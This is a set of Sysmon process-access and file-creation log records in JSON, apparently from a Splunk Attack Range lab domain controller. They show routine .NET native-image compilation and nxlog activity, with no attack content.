{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:01.996\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010389D0B00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:01.996","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010389D0B00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:02.168\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010F9A00B00}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:02.168","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010F9A00B00}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:02.168\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010F9A00B00}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:02.168","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010F9A00B00}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:02.168\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-132E-5F25-0000-0010F9A00B00}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:02.168","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-132E-5F25-0000-0010F9A00B00}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:02.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:02.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:03.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:03.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:04.528\r\nProcessGuid: {E2A3D6B1-132E-5F25-0000-0010F9A00B00}\r\nProcessId: 4280\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10b8-0\\Microsoft.Build.Tasks.v4.0.dll\r\nCreationUtcTime: 2020-08-01 07:01:04.528","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:04.528","ProcessGuid":"{E2A3D6B1-132E-5F25-0000-0010F9A00B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10b8-0\\Microsoft.Build.Tasks.v4.0.dll","CreationUtcTime":"2020-08-01 07:01:04.528","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:04.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:04.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
